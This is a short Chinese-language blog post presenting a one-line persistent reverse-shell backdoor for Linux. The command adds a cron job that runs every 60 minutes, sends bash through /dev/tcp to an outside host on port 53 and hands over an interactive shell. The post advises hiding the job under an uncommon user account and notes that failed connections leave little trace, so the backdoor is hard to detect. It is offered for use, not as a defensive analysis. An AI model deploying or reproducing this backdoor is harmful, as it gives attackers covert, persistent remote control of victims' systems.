一条命令实现无文件兼容性强的反弹后门

  • A+
所属分类:网络安全

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username 

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

60分钟反连一次,在未连接状态启动反连任务的时候,进程和端口都无状态 

-bash: connect: Connection refused 
-bash: /dev/tcp/dns.wuyun.org/53: Connection refused 
-bash: 9: Bad file descriptor 
-bash: 9: Bad file descriptor

也就是说,你安装后,如果不连接成功,是很难被发现的。

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: